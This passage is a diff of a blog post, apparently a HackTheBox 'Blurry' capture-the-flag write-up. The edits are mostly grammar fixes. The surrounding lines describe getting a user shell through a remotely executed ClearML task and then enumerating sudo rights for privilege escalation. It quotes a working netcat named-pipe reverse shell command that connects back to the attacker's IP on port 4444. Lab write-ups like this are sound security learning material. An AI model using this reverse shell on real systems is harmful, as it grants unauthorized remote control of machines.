Rezy-Dev/Rezy-Dev.github.io/content/posts/HackTheBox/Blurry/index.md

 task.execute_remotely(queue_name='default')
 ```

-Now, if i execute the above script on the same location where i had installed clearml, I will get shell on the port 4444. as i have mentioned my tun0 ip and thee port where i want rev shell on my script:
+Now, if I execute the above script in the same location where I installed ClearML, I will get a shell on port 4444.
+In my script, I have specified my tun0 IP address and the port for the reverse shell:

 `cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.62 4444 >/tmp/f"` here.

-once we run the script it makes a task and upload the artifact and then we get shell.
+Once we run the script, it creates a task, uploads the artifact, and then we receive the shell.

-And now, we got shell as user and user flag.
+At this point, we have a shell as the user and have obtained the user flag.

 ## Root Flag

-If i see `sudo -l` i can se i can run the `/usr/bin/evaluate_model` binary as root and we dont need password as well.
+If I run `sudo -l`, I can see that I can execute the `/usr/bin/evaluate_model` binary as root without needing a password.

 ```
 jippity@blurry:~$ sudo -l